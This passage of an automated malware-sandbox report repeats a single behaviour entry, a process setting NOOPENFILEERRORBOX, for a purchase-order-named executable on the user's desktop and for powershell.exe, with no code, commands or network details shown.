                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
